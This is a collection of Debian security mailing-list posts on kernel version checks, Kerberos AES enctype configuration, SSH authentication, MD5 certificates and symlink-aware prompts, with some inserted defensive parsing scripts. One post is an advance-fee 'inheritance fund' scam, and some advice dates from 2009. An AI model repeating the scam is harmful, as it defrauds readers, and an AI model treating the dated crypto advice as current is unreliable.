We might derotate servers from dns when they fall behind or provide
wrong data, or we might retire them or we might repurpose them.

The DNS will point to servers providing the services, but the actual IP
addresses might change (and regularly do).


The proper fix is to kick your networking people so that deb
http://security.d.o and friends work.



Archive: http://lists.debian.org/20110831060115.gh11...@anguilla.noreply.org



Re: [SECURITY] [DSA 2076-1] New gnupg2 packages fix potential code execution

2010-07-27 Thread Peter Palfrader
On Tue, 27 Jul 2010, Florian Weimer wrote:

> > For the stable distribution (lenny), this problem has been fixed in
> > version 2.0.9-3.1+lenny1.
> 
> Hi,
> 
> we're investigating an issue with the dissemination of the gnupg2
> security update (and the recent DSA-2075-1 update for xulrunner)
> through the security.debian.org infrastructure.  The updates are
> currently not available.  We hope to resolve that soon.

Looks like all is well now.

Cheers,


Archive: http://lists.debian.org/20100727213010.gq9...@anguilla.noreply.org



Re: [SECURITY] [DSA 2006-1] New sudo packages fix several vulnerabilities

2010-03-02 Thread Peter Kringle
I did receive your email, but I want you to know that I have changed my email 
address to pe...@kringles.org as I am 
moving away from planetnet.org. Please update your address book to reflect 
this.  Thank you.

--
Peter (KØVX)
2CFF D38A 3F42 B215 2098  DA89 26C4 A1B6 3C6E 199F


Archive: http://lists.debian.org/20100302204046.cb7a846...@ns1.planetnet.org



Linux 2.6 update for Etch

2010-02-18 Thread Peter Pentchev
Hi,

First of all, apologies if this is sent to the wrong list, or if this
information is already available somewhere; also, I'm aware that
security support for Debian Etch ended a couple of days ago.

In the recent DSA-1996-1 for the linux-2.6 package vulnerabilities,
there was the following sentence:

  For the oldstable distribution (etch), these problems, where
  applicable, will be fixed in updates to linux-2.6 and linux-2.6.24.

Now, since we have several servers that we are currently in the process of
migrating to Lenny, but the migration will not be complete for at
least several more weeks (and yes, I know this is our own fault :),
I'd just like to ask if there's any timeframe on when the Etch
updates for the linux-2.6 package shall be released - without meaning
to hurry anybody or to be pushy or something; I'm quite aware of
all the work that goes into maintaining security updates across
multiple versions of multiple packages on old distributions,
and the security team has my sincere thanks and condolences for all
the work they have to do so we can sleep soundly :)

Or maybe I'm missing something and the Etch update has already been
released?  But the only updated package I can see at
http://security.debian.org/pool/updates/main/l/ is the "latest" one -
linux-latest-2.6_6etch3; but from what I can see, it builds
the linux-image-2.6-amd64_2.6.18+6etch3 package, which just depends on
linux-image-2.6.18-6-amd64 (the actual kernel), and the actual kernel
at http://security.debian.org/pool/updates/main/l/linux-2.6/ seems
to still be at version 2.6.18.dfsg.1-26etch1 from November 5, 2009.

Am I missing something, or is it just a question of manpower and time?
If the latter, sorry if this mail comes through as pushy - it's really
not meant to be!

Again, thanks to the security team for all their hard work!
Please CC me on replies, since I'm not subscribed to this list.

G'luck,
Peter

-- 
Peter Pentchev  r...@ringlet.net  r...@cnsys.bg  r...@freebsd.org
PGP key:http://people.FreeBSD.org/~roam/roam.key.asc
Key fingerprint 2EE7 A7A5 17FC 124C F115  C354 651E EFB0 2527 DF13
This sentence contradicts itself - or rather - well, no, actually it doesn't!




running vs. installed kernel (was: rootkit not found by rkhunter)

2009-10-06 Thread Peter Palfrader
On Mon, 05 Oct 2009, dann frazier wrote:

> On Sun, Oct 04, 2009 at 12:16:14PM -0400, Michael S Gilbert wrote:
> > On Sun, 4 Oct 2009 11:44:52 -0400 Thomas Krichel wrote:
> > >   It looks like the affected machines run older kernels, so 
> > >   I will follow your advice and upgrade. 
> > 
> > i forgot to mention that 'uname -r' won't actually tell you whether you
> > are running the most up-to-date debian kernel.  to do that, look at the
> > output of 'dpkg -l | grep linux-image-$(uname -r)'.
> 
> cat /proc/version is nice because it is the running kernel, and
> includes the package version.

Also, maybe
http://git.debian.org/?p=mirror/dsa-nagios.git;a=blob;f=dsa-nagios-checks/checks/dsa-check-running-kernel;hb=HEAD
might be useful for some.

I don't claim it works in all the cases, or finds every weird
combination out there, but it seems to do a pretty good job of helping
us not forget to reboot systems.

I'm sure the interested parties can butcher it for parts if they don't
want all it does (i.e. maybe not everyone wants the get_avail magic).

Cheers,
weasel
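Added example (not the dsa-check-running-kernel script linked above): the comparison dann and Michael describe, done from /proc/version and dpkg output, so that "uname -r matches an installed package" is not mistaken for "the running kernel is the installed one". The two /proc/version layouts handled are assumptions about the banner Debian kernels print (the older "(Debian <version>)" style and the newer "#1 SMP Debian <version> (<date>)" style); the sample banners, package versions and builder address are constructed.

```python
import re

# Constructed /proc/version samples in the two assumed Debian banner layouts.
PROC_VERSION_NEW = ("Linux version 3.16.0-4-amd64 (kernel-builder@example.org) "
                    "(gcc version 4.8.4 (Debian 4.8.4-1) ) "
                    "#1 SMP Debian 3.16.7-ckt25-2+deb8u2 (2016-04-08)")
PROC_VERSION_OLD = ("Linux version 2.6.26-2-amd64 (Debian 2.6.26-26lenny1) "
                    "(kernel-builder@example.org) (gcc version 4.1.3 (Debian 4.1.2-25)) "
                    "#1 SMP Wed Nov 4 20:45:37 UTC 2009")
# Constructed output of: dpkg-query -W -f='${Package} ${Version}\n' 'linux-image-*'
DPKG_OUTPUT = """\
linux-image-3.16.0-4-amd64 3.16.7-ckt25-2+deb8u3
linux-image-amd64 3.16+63+deb8u3
"""


def running_kernel(proc_version):
    """(release, Debian package version) from /proc/version; the version is
    None when the banner has no recognisable Debian version string."""
    m = re.match(r"Linux version (\S+)", proc_version)
    if not m:
        raise ValueError("not a /proc/version banner")
    release = m.group(1)
    old = re.match(r"Linux version \S+ \(Debian ([^)]+)\)", proc_version)
    if old:
        return release, old.group(1)
    new = re.search(r"#\d+ .*?\bDebian (\S+) \(\d{4}-\d{2}-\d{2}\)", proc_version)
    return release, (new.group(1) if new else None)


def installed_kernels(dpkg_output):
    """{package: version} from 'dpkg-query -W -f=${Package} ${Version}\\n'."""
    pkgs = {}
    for line in dpkg_output.splitlines():
        parts = line.split()
        if len(parts) == 2:
            pkgs[parts[0]] = parts[1]
    return pkgs


def reboot_needed(proc_version, dpkg_output):
    """Compare the running kernel's package version with the installed one
    for the same release string. Returns (needed, reason)."""
    release, running = running_kernel(proc_version)
    pkg = f"linux-image-{release}"
    installed = installed_kernels(dpkg_output).get(pkg)
    if installed is None:
        return True, f"{pkg} is not installed; the running kernel has no package"
    if running is None:
        return True, f"cannot read a Debian version from /proc/version; installed is {installed}"
    if running != installed:
        return True, f"running {running}, installed {installed}"
    return False, f"running kernel {release} {running} matches the installed package"


if __name__ == "__main__":
    # On a real host replace the samples with open("/proc/version").read()
    # and the output of the dpkg-query command above.
    for banner in (PROC_VERSION_NEW, PROC_VERSION_OLD):
        needed, why = reboot_needed(banner, DPKG_OUTPUT)
        print("reboot needed" if needed else "ok", "-", why)
```

uname -r only reports the release string (3.16.0-4-amd64 in the sample), which does not change between security uploads of the same ABI; the package version in /proc/version does.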





Re: HEAD's UP: possible 0day SSH exploit in the wild

2009-07-10 Thread Peter Jordan
Russ Allbery, Fri Jul 10 2009 19:24:52 GMT+0200 (CEST):
> Peter Jordan  writes:
>> Russ Allbery, Fri Jul 10 2009 16:31:14 GMT+0200 (CEST):
> 
> 
>> But for new installations a change is not a bad idea?
> 
> Yeah, for new installations it's generally best to start the master key
> at the strongest supported key type.  MIT 1.7 supports rekeying, though,
> which makes things much simpler.
> 
> 
>> How can i see that the change has worked?
> 
> klist -e will show you the enctypes of the tickets in your cache.  You
> can also check the enctypes of the tickets issued by the KDC in the KDC
> logs, although those are numeric and a bit less easy to understand.
> 

hmmm, although i have set supported enctypes
supported_enctypes = aes256-cts:normal
and restarted kdc nothing seems to have changed.

After calling "kinit" klist -5e shows me:
Etype (skey, tkt): Triple DES cbc mode with HMAC/sha1, Triple DES cbc
mode with HMAC/sha1

PJ





Re: HEAD's UP: possible 0day SSH exploit in the wild

2009-07-10 Thread Peter Jordan
Russ Allbery, Fri Jul 10 2009 16:31:14 GMT+0200 (CEST):
> Peter Jordan  writes:
> 
>> Let the option
>>  master_key_type = des3-hmac-sha1
>> as it is?
> 
> Yes.  The master key isn't used on the network and changing it is very
> difficult in lenny.

But for new installations a change is not a bad idea?

> 
>> No change in /etc/krb5.conf required?
> 
> Correct.  Clients will negotiate the strongest available encryption key
> automatically.

How can I see that the change has worked?

> 
>> should i renew all host keys?
> 
> Ideally, yes, since that will get them on AES only.  If you have any
> existing keys that don't have AES keys, you do need to list fallback
> enctypes as supported until you've rekeyed them or you won't be able to
> authenticate to them.
> 

It seems to work without renewing old keys (host/nfs). How can I see
which enctypes the keys have?

BTW, if I list the principal for me in kadmin.local there are no values
for Last successful authentication / Last failed authentication and
Failed password attempts although the REQUIRES_PRE_AUTH attribute is set:

get_principal peter
Principal: pe...@example.com
[...]
Last successful authentication: [never]
Last failed authentication: [never]
Failed password attempts: 0
Number of keys: 6
Key: vno 1, Triple DES cbc mode with HMAC/sha1, no salt
Key: vno 1, DES cbc mode with CRC-32, no salt
Key: vno 1, DES cbc mode with RSA-MD5, Version 4
Key: vno 1, DES cbc mode with RSA-MD5, Version 5 - No Realm
Key: vno 1, DES cbc mode with RSA-MD5, Version 5 - Realm Only
Key: vno 1, DES cbc mode with RSA-MD5, AFS version 3
Attributes: REQUIRES_PRE_AUTH
Policy: [none]

Do you know what is wrong?

thank you very much!

PJ
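A check for the two outputs quoted in this thread, added here as an example and not part of the posts: it parses the `Key:` lines of kadmin's getprinc and the `Etype (skey, tkt):` line of `klist -e` and classifies each enctype as AES, 3DES, DES or RC4. The getprinc and klist text embedded below is copied from the messages above; the AES-only sample is constructed. Two things the output above already shows and the check makes easy to spot across many principals: `supported_enctypes` in kdc.conf only governs keys created after the change, so a principal keeps its old DES/3DES keys until it is rekeyed (cpw or ktadd with -e), and the ticket enctype reported by klist is that of the krbtgt/REALM key, which therefore has to be rekeyed as well before tickets come out as AES.

```python
"""Added example (not from the list thread): classify the enctypes shown by
kadmin's getprinc and by 'klist -e' so that principals or tickets still on
DES/3DES/RC4 stand out after a supported_enctypes change."""
import re

KEY_LINE_RE = re.compile(r"^Key: vno (?P<vno>\d+), (?P<enctype>[^,]+), (?P<salt>.+)$")
ETYPE_LINE_RE = re.compile(r"^Etype \(skey, tkt\): (?P<skey>[^,]+), (?P<tkt>.+)$")


def classify_enctype(name):
    """Map an MIT enctype display name to one of aes, 3des, des, rc4, unknown."""
    n = name.strip().lower()
    if "aes" in n:
        return "aes"
    if "triple des" in n or "des3" in n:      # test before plain DES
        return "3des"
    if n.startswith("des ") or n.startswith("des-"):
        return "des"
    if "arcfour" in n or "rc4" in n:
        return "rc4"
    return "unknown"


def keys_from_getprinc(text):
    """[(vno, enctype, class)] for every 'Key:' line of getprinc output."""
    keys = []
    for line in text.splitlines():
        m = KEY_LINE_RE.match(line.strip())
        if m:
            enctype = m.group("enctype")
            keys.append((int(m.group("vno")), enctype, classify_enctype(enctype)))
    return keys


def weak_keys(text):
    """The principal's keys that are not AES; empty once it is fully rekeyed."""
    return [k for k in keys_from_getprinc(text) if k[2] != "aes"]


def ticket_enctypes(text):
    """[(session key class, ticket class)] for each 'Etype' line of klist -e."""
    out = []
    for line in text.splitlines():
        m = ETYPE_LINE_RE.match(line.strip())
        if m:
            out.append((classify_enctype(m.group("skey")),
                        classify_enctype(m.group("tkt"))))
    return out


# getprinc and klist output as quoted in the thread above.
GETPRINC_FROM_THREAD = """\
Number of keys: 6
Key: vno 1, Triple DES cbc mode with HMAC/sha1, no salt
Key: vno 1, DES cbc mode with CRC-32, no salt
Key: vno 1, DES cbc mode with RSA-MD5, Version 4
Key: vno 1, DES cbc mode with RSA-MD5, Version 5 - No Realm
Key: vno 1, DES cbc mode with RSA-MD5, Version 5 - Realm Only
Key: vno 1, DES cbc mode with RSA-MD5, AFS version 3
Attributes: REQUIRES_PRE_AUTH
"""
KLIST_FROM_THREAD = ("Etype (skey, tkt): Triple DES cbc mode with HMAC/sha1, "
                     "Triple DES cbc mode with HMAC/sha1")

# Constructed: what getprinc shows after 'cpw -e aes256-cts:normal'.
GETPRINC_AES_ONLY = """\
Number of keys: 1
Key: vno 2, AES-256 CTS mode with 96-bit SHA-1 HMAC, no salt
"""

if __name__ == "__main__":
    for vno, enctype, cls in weak_keys(GETPRINC_FROM_THREAD):
        print("weak key vno %d: %s (%s)" % (vno, enctype, cls))
    print("ticket enctypes:", ticket_enctypes(KLIST_FROM_THREAD))
```

Feed it `kadmin.local -q "getprinc <name>"` output per principal and it gives you the rekeying to-do list; run it on `klist -e` after kinit to confirm the krbtgt side is done.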





Re: HEAD's UP: possible 0day SSH exploit in the wild

2009-07-10 Thread Peter Jordan
Russ Allbery, Fri Jul 10 2009 00:56:57 GMT+0200 (CEST):
> Peter Jordan  writes:
> 
>> btw is it possible to use any kind of one time password mechanism with
>> mit kdc?
> 
> Not without applying custom patches that are rather a hack.  You can,
> however, do PKINIT, which lets you use smart cards that can do X.509
> authentication (some of which are quite inexpensive these days).  We're
> evaluating the DESfire cards for our purposes.
> 

Hmmm, that does not solve the problem when I have to log in from an
insecure computer (i.e. an Internet cafe). I know you should not connect to
your network from insecure computers, but sometimes you have no choice.

PJ





Re: HEAD's UP: possible 0day SSH exploit in the wild

2009-07-10 Thread Peter Jordan
Russ Allbery, Fri Jul 10 2009 00:55:42 GMT+0200 (CEST):
> Peter Jordan  writes:
>> Russ Allbery, Thu Jul 09 2009 21:51:50 GMT+0200 (CEST):
> 
> 
> 
> However, if you also have AFS, which I recall that you do, you can't
> turn it off at that level.  You have to leave DES as a supported enctype
> since the AFS service key at present still has to be DES (although we're
> working on that).  In that case, you have to deal with it at creation
> time for each principal.  In other words, when you do addprinc or ktadd
> for everything other than the AFS service key, pass the -e
> "aes256-cts:normal" option to the command to force the enctypes to be
> restricted to 256-bit AES.
> 


We use NFSv4.

PJ





Re: HEAD's UP: possible 0day SSH exploit in the wild

2009-07-10 Thread Peter Jordan
Russ Allbery, Fri Jul 10 2009 00:55:42 GMT+0200 (CEST):
> Peter Jordan  writes:
>> Russ Allbery, Thu Jul 09 2009 21:51:50 GMT+0200 (CEST):
> 
>>> Ensuring that you use AES enctypes for all keys (disable DES and
>>> ideally also 3DES)
> 
>> How?
> 
> In /etc/krb5kdc/kdc.conf, set the supported_enctypes configuration
> option for your realm to:
> 
> supported_enctypes = aes256-cts:normal
> 
> Note that you'll also need to enable rc4-hmac:normal if you need to do
> cross-realm trust with Active Directory, and you'll need to enable
> des3-hmac-sha1:normal if you have any Java 1.4 clients.
> 
> However, if you also have AFS, which I recall that you do, you can't
> turn it off at that level.  You have to leave DES as a supported enctype
> since the AFS service key at present still has to be DES (although we're
> working on that).  In that case, you have to deal with it at creation
> time for each principal.  In other words, when you do addprinc or ktadd
> for everything other than the AFS service key, pass the -e
> "aes256-cts:normal" option to the command to force the enctypes to be
> restricted to 256-bit AES.
> 


Leave the option
master_key_type = des3-hmac-sha1
as it is?

No change in /etc/krb5.conf required?

Should I renew all host keys?

PJ





Re: HEAD's UP: possible 0day SSH exploit in the wild

2009-07-09 Thread Peter Jordan
Russ Allbery, Thu Jul 09 2009 21:51:50 GMT+0200 (CEST):
> Peter Jordan  writes:
> 
>> It would be a stand alone MIT KDC (with krb-rsh) on debian lenny.
>>
>> "safe" in the sense of "you better attack the services which depends on
>> kerberos than kerberos itself"
> 
> That's what we've done at Stanford for many, many years, and I'm
> comfortable doing so.  The Debian MIT Kerberos maintainers (of which I'm
> one) receive advance notice of upcoming security vulnerability
> announcements and always prepare security updates in advance for any KDC
> vulnerabilities.
> 

BTW, is it possible to use any kind of one-time password mechanism with
the MIT KDC?

thanks,

PJ





Re: HEAD's UP: possible 0day SSH exploit in the wild

2009-07-09 Thread Peter Jordan
Russ Allbery, Thu Jul 09 2009 21:51:50 GMT+0200 (CEST):
> 
> Ensuring that you use AES enctypes for all keys (disable DES and ideally
> also 3DES) 
> 

How?





Re: HEAD's UP: possible 0day SSH exploit in the wild

2009-07-09 Thread Peter Jordan
pod, Thu Jul 09 2009 21:38:31 GMT+0200 (CEST):
> Peter Jordan  writes:
> 
>> It is not my decision to isolate kerberos.
>>
>> Is it safe to open kerberos for the world?
> 
> It's not clear that anyone on this list can answer that question since it
> depends on what "safe" and "kerberos" mean in the context of your
> organization.  The meaning of "safe" is defined by the organizational
> security policy and the meaning of "kerberos" will depend on which
> implementation has been used.
> 
> For example there seems to be a school of thought amongst certain
> deployers of Active Directory (a component of which is a kerberos KDC)
> that it should not be exposed more widely than strictly necessary.  There
> are however plenty of deployments of Heimdal and MIT KDCs that are exposed
> to the world and, incidentally, derive much advantage by so doing.
> 
> 

It would be a stand alone MIT KDC (with krb-rsh) on debian lenny.

"safe" in the sense of "you had better attack the services which depend on
kerberos than kerberos itself"

PJ





Re: HEAD's UP: possible 0day SSH exploit in the wild

2009-07-09 Thread Peter Jordan
Russ Allbery, Thu Jul 09 2009 20:45:57 GMT+0200 (CEST):
> Peter Jordan  writes:
> 
>> I want to login passwordless to my ssh server from the internet. VPN
>> is not available and kerberos is not accessible from outside the
>> LAN. How?
> 
> Fix the last problem.  Otherwise, yes, you can't use Kerberos.
> 
> Authentication systems really need to be exposed to all sites from which
> one wishes to authenticate or they're not horribly helpful.
> 

It is not my decision to isolate kerberos.

Is it safe to open kerberos for the world?

PJ





Re: HEAD's UP: possible 0day SSH exploit in the wild

2009-07-09 Thread Peter Jordan
Noah Meyerhans, Thu Jul 09 2009 18:04:54 GMT+0200 (CEST):
> On Thu, Jul 09, 2009 at 06:02:37PM +0200, Peter Jordan wrote:
>> And how to login passwordless from outside the kerberos network?
> 
> There's no such thing as "outside the kerberos network".
> 
> noah
> 

I want to login passwordless to my ssh server from the internet. VPN is
not available and kerberos is not accessible from outside the LAN. How?

PJ





Re: HEAD's UP: possible 0day SSH exploit in the wild

2009-07-09 Thread Peter Jordan
Russ Allbery, Thu Jul 09 2009 17:04:06 GMT+0200 (CEST):
> Peter Jordan  writes:
>> Noah Meyerhans, Wed Jul 08 2009 23:13:30 GMT+0200 (CEST):
> 
> 
>> Do you use kerberos/nfsv4 and ssh keys? If yes, how do you handle the
>> problem that the authorized_keys file is not accessible without a krb
>> ticket?
> 
> If you have Kerberos, why would you use ssh keys?  GSS-API is so much
> nicer if you already have a Kerberos environment.
> 

And how to login passwordless from outside the kerberos network?

PJ





Re: HEAD's UP: possible 0day SSH exploit in the wild

2009-07-08 Thread Peter Jordan
Justus, Tue Jul 07 2009 22:36:31 GMT+0200 (CEST):
> Is there Information on what Versions are affected by this exploit?
> I read something of Version 3.2 and 4.3 in one of the blog entrys
> (http://secer.org/hacktools/0day-openssh-remote-exploit.html), maybe
> someone else could clarify this?
> Would you recommend stopping ssh completely and switching to remote control?
> Regards,
> Justus
> 
> 

I recompiled the openssh lenny version for etch without problems. Are there
any reasons against installing this version in etch?

PJ





Re: HEAD's UP: possible 0day SSH exploit in the wild

2009-07-08 Thread Peter Jordan
Sebastian Posner, Wed Jul 08 2009 23:18:43 GMT+0200 (CEST):
> Jim Popovitch wrote:
> 
>> Is there a way to force keys AND passwd verification?
> 
> Normally you'd want to DISABLE PasswordAuthentication and 
> ChallengeResponseAuthentication - unless you have a special and 
> well-maintained setup like e.g. One-Time-Pads or such - because both can 
> potentially be brute-forced way faster than SSH-keys.

Why not use PasswordAuthentication and/or
ChallengeResponseAuthentication like opie/otpw/freeauth? I think it's
better than passwordless ssh keys, and strong passwords and fail2ban
should help against brute force.

PJ





Re: HEAD's UP: possible 0day SSH exploit in the wild

2009-07-08 Thread Peter Jordan
Noah Meyerhans, Wed Jul 08 2009 23:13:30 GMT+0200 (CEST):
> (Plus we've got Kerberos and don't usually mess around with keys or
> passwords).
> 

Do you use kerberos/nfsv4 and ssh keys? If yes, how do you handle the
problem that the authorized_keys file is not accessible without a krb
ticket?

PJ





Re: [SECURITY] [DSA 1694-1] New xterm packages fix remote code execution

2009-01-02 Thread Peter Palfrader
On Fri, 02 Jan 2009, Florian Weimer wrote:

> As an additional precaution, this security update also disables font
> changing

Is this really necessary?  I use that feature a lot and I rely on it for
most of my desktop setup.  What are other (scriptable) means to change
font size from within an xterm?

Not amused,
Peter
-- 
   |  .''`.  ** Debian GNU/Linux **
  Peter Palfrader  | : :' :  The  universal
 http://www.palfrader.org/ | `. `'  Operating System
   |   `-http://www.debian.org/





Re: Certification Authorities are recommended to stop using MD5 altogether

2009-01-01 Thread Peter Palfrader
On Thu, 01 Jan 2009, Cristian Ionescu-Idbohrn wrote:

> Still, the original question was (sort of) whether MD5 signed certificates
> like this one:

> Certificate:
> Data:
> Version: 3 (0x2)
> Serial Number: 1 (0x1)
> Signature Algorithm: md5WithRSAEncryption
> ^
> Issuer: C=ZA, ST=Western Cape, L=Cape Town, O=Thawte Consulting cc, 
> OU=Certification Services Division, CN=Thawte Server 
> CA/emailaddress=server-ce...@thawte.com
> Subject: C=ZA, ST=Western Cape, L=Cape Town, O=Thawte Consulting cc, 
> OU=Certification Services Division, CN=Thawte Server 
> CA/emailaddress=server-ce...@thawte.com

The algorithm used for the self sign doesn't really matter.  What you
care about is md5 used in any place but the root of any cert chains
you encounter.

-- 
       |  .''`.  ** Debian GNU/Linux **
  Peter Palfrader  | : :' :  The  universal
 http://www.palfrader.org/ | `. `'  Operating System
   |   `-http://www.debian.org/
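The rule in the reply above, as an added example (not from the thread) against the text form openssl prints: parse `openssl x509 -noout -text` dumps for each certificate of a chain, treat a certificate whose Subject equals its Issuer as the self-signed root, and report MD5 signatures only on the others. The three dumps below are constructed and cut down to the fields the check reads; real dumps carry many more lines, which the regular expressions skip.

```python
"""Added example (not from the thread): find the MD5 signatures that matter
in a certificate chain given as 'openssl x509 -noout -text' dumps."""
import re

SIGALG_RE = re.compile(r"^\s*Signature Algorithm:\s*(\S+)", re.M)
ISSUER_RE = re.compile(r"^\s*Issuer:\s*(.+?)\s*$", re.M)
SUBJECT_RE = re.compile(r"^\s*Subject:\s*(.+?)\s*$", re.M)


def parse_x509_text(dump):
    """Signature algorithm, issuer and subject from an openssl text dump."""
    cert = {}
    for key, rx in (("sigalg", SIGALG_RE), ("issuer", ISSUER_RE),
                    ("subject", SUBJECT_RE)):
        m = rx.search(dump)
        if not m:
            raise ValueError("no %s line in certificate dump" % key)
        cert[key] = m.group(1)
    return cert


def is_self_signed(cert):
    """Subject equals Issuer: a root, i.e. a certificate whose signature no
    relying party verifies against a different key."""
    return cert["subject"] == cert["issuer"]


def md5_findings(dumps):
    """Subjects of non-self-signed certificates signed with an MD5 algorithm.
    The root's self-signature is deliberately ignored: clients trust the root
    by its presence in the trust store, not by checking that signature."""
    findings = []
    for dump in dumps:
        cert = parse_x509_text(dump)
        if "md5" in cert["sigalg"].lower() and not is_self_signed(cert):
            findings.append(cert["subject"])
    return findings


# Constructed dumps, reduced to the lines the check reads.
ROOT = """\
Certificate:
    Data:
        Signature Algorithm: md5WithRSAEncryption
        Issuer: C=XX, O=Example, CN=Example Root CA
        Subject: C=XX, O=Example, CN=Example Root CA
"""
INTERMEDIATE = """\
Certificate:
    Data:
        Signature Algorithm: md5WithRSAEncryption
        Issuer: C=XX, O=Example, CN=Example Root CA
        Subject: C=XX, O=Example, CN=Example Intermediate CA
"""
LEAF = """\
Certificate:
    Data:
        Signature Algorithm: sha1WithRSAEncryption
        Issuer: C=XX, O=Example, CN=Example Intermediate CA
        Subject: C=XX, O=Example, CN=www.example.org
"""

if __name__ == "__main__":
    print(md5_findings([ROOT, INTERMEDIATE, LEAF]))
```

The intermediate is the one to worry about: a collision against its MD5 signature lets an attacker mint a certificate the chain accepts, whereas the root's own MD5 self-signature is never what a client relies on.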





Re: Microsoft-IIS/6.0 serves up Debian... WTF!

2008-06-08 Thread Peter Palfrader
On Sun, 08 Jun 2008, Jim Popovitch wrote:

> I would think that neither of those cases immediately passes muster
> with concerned security minded folks.  And, just because you are OK
> with it, it doesn't mean I have to be. ;-)

Clearly the people in charge are.  Can we move on to relevant stuff now?

-- 
weasel





realpath in PS1 bash

2008-05-19 Thread Peter Kuma
Hi folks

I didn't receive any response on debian-user, hopefully this is an
appropriate place to ask.

I'm wondering if it would be a good idea to have PS1 set to

'${debian_chroot:+($debian_chroot)[EMAIL PROTECTED]:$(realpath "$(pwd)")\$ '

instead of the default

'${debian_chroot:+($debian_chroot)[EMAIL PROTECTED]:\w\$ '

and make it a suggestion in /etc/skel/.bashrc for those users who want
to see the actual current working directory.

 From a security standpoint you could enter e.g.
/home/someoneelse/somedir/ and see [EMAIL PROTECTED]:/home/someoneelse/somedir/$
in the prompt, but really be in /etc/ if somedir is a (potentially
malicious) symlink to /etc created by a different user. It could get
quite disastrous if you decide to run something like rm -r * in such a
directory.

It won't be very helpful with more sophisticated symlink race
conditions, but it is better than nothing.

Perhaps I should post it to bash package wishlist, what do you think?

Peter Kuma
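The difference the proposal is about, as an added shell example that is not part of the post: `\w` expands to the logical path the shell tracked through `cd`, while `realpath`, or the shell builtin `pwd -P`, gives the directory you are physically in. The script builds a throwaway tree with a symlink inside a `mktemp` directory (so the /home/someoneelse and /etc paths from the post become names under that temporary directory) and reports both views; nothing outside the temporary directory is touched.

```sh
#!/bin/sh
# Added example, not part of the list post: show the logical vs the physical
# working directory after a plain 'cd' through a symlink.  Everything lives
# under a temporary directory; nothing else on the system is touched.
set -eu

# Build <tmp>/home/someoneelse/somedir -> <tmp>/etc_real, cd into it the way
# an interactive user would, and print both views of the current directory.
show_cwd_after_symlink_cd() {
    tmp=$(mktemp -d)
    mkdir -p "$tmp/etc_real" "$tmp/home/someoneelse"
    ln -s "$tmp/etc_real" "$tmp/home/someoneelse/somedir"
    # Subshell: the caller's working directory is left alone.
    (
        cd "$tmp/home/someoneelse/somedir"
        # $PWD is what \w shows; pwd -P resolves symlinks like realpath does.
        printf 'logical=%s physical=%s\n' "$PWD" "$(pwd -P)"
    )
    rm -rf "$tmp"
}

# Exit status 0 when the shell's idea of its directory differs from the real
# one, i.e. when a prompt based on \w would be misleading.
cwd_is_via_symlink() {
    [ "$PWD" != "$(pwd -P)" ]
}

show_cwd_after_symlink_cd
```

A prompt built from `$(pwd -P)` gives the same result as the `realpath "$(pwd)"` form in the post without depending on an external binary; as the post says, it protects against a planted symlink you walked into, not against one swapped in after you looked.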






Re: [SECURITY] [DSA 1565-1] New Linux 2.6.18 packages fix several vulnerabilities

2008-05-05 Thread Peter Palfrader
On Mon, 05 May 2008, Peter Palfrader wrote:

> On Mon, 05 May 2008, Bernd Eckenfels wrote:
> 
> > In article <[EMAIL PROTECTED]> you wrote:
> > > Apropos.  Is there a way to get that information from a vmlinuz file on
> > > disk?  Without booting it, that is.
> > 
> > Interesting enough my (somewhat older) file command does only print "x86
> > boot sector", but I think some magic files supported it. Otherwise you can
> > use "strings vmlinux | fgrep 2."
> 
> This does not appear to work well on at least armel.

Or, more generally, when the kernel is compressed.
http://svn.noreply.org/svn/weaselutils/trunk/nagios-check-running-kernel
is what I deployed on .debian.org so far.

Cheers, and thanks,
weasel





Re: [SECURITY] [DSA 1565-1] New Linux 2.6.18 packages fix several vulnerabilities

2008-05-05 Thread Peter Palfrader
On Mon, 05 May 2008, Bernd Eckenfels wrote:

> In article <[EMAIL PROTECTED]> you wrote:
> > Apropos.  Is there a way to get that information from a vmlinuz file on
> > disk?  Without booting it, that is.
> 
> Interesting enough my (somewhat older) file command does only print "x86
> boot sector", but I think some magic files supported it. Otherwise you can
> use "strings vmlinux | fgrep 2."

This does not appear to work well on at least armel.





Re: [SECURITY] [DSA 1565-1] New Linux 2.6.18 packages fix several vulnerabilities

2008-05-04 Thread Peter Palfrader
On Mon, 05 May 2008, Bernd Eckenfels wrote:

> In article <[EMAIL PROTECTED]> you wrote:
> > Apropos.  Is there a way to get that information from a vmlinuz file on
> > disk?  Without booting it, that is.
> 
> Interesting enough my (somewhat older) file command does only print "x86
> boot sector", but I think some magic files supported it. Otherwise you can
> use "strings vmlinux | fgrep 2."
> 
> I usually use the file name to describe it.

debian.org kernel packages don't, however.  Which makes it not exactly
suitable for a nagios check for "is the running kernel the one on the
filesystem".

Sure, strings | grep works, but that's quite .. ugly and at least gives
the impression of being fragile.

Peter





Re: [SECURITY] [DSA 1565-1] New Linux 2.6.18 packages fix several vulnerabilities

2008-05-04 Thread Peter Palfrader
On Sat, 03 May 2008, Dominic Hargreaves wrote:

> cat /proc/version
> 
> will give you the full version of the booted kernel.

Apropos.  Is there a way to get that information from a vmlinuz file on
disk?  Without booting it, that is.

Peter





Re: How about carrying this list on gmane?

2008-01-17 Thread Peter Jordan
Johannes Graumann, 01/17/08 13:07:

> See subject,
> 
> Joh

gmane.linux.debian.devel.security ???





Inheritance fund

2007-09-14 Thread Dr Peter Edward
Please note my new e-mail address. New e-mail address: [EMAIL PROTECTED]

From Dr Peter Edward

Director Bank of England

This is to inform you that your fund of $15m has been approved for immediate 
delivery.

[EMAIL PROTECTED]

Thanks.

- Dr Peter Edward



Re: Bug#383030: Fix for one of the two vulnerabilities

2006-08-22 Thread Jens Peter Secher

On 8/22/06, Martín Ferrari <[EMAIL PROTECTED]> wrote:


I think this patch fixes the first vulnerability reported. I'm CCing
debian-security as it would be good if somebody more seasoned in this
matters could take a look at it (please CC me).


Lukáš Lalinský is upstream maintainer as well as Debian package
maintainer.  He is in the process of dealing with this.

Lukáš, could you put a note about your plans in the two open bugs?

Cheers,
--
   Jens Peter Secher
_DD6A 05B0 174E BFB2 D4D9 B52E 0EE5 978A FE63 E8A1 jpsecher gmail com_
A. Because it breaks the logical sequence of discussion
Q. Why is top posting bad?



Re: Command history log for audit trail

2006-06-15 Thread DI Peter Burgstaller


You can run snoopy, which will log all commands issued into auth.log.
Cheers, Peter

On 15.06.2006, at 22:08, [EMAIL PROTECTED] wrote:




> I need to set up an audit trail for all commands run on machines.  I
> know that the auth.log records who logs in and when, and that each
> user's .bash_history has a history of their commands.  But is there some
> other way to create a log for all commands run on a system?











Re: Restricting ssh access to internet but not to internal network

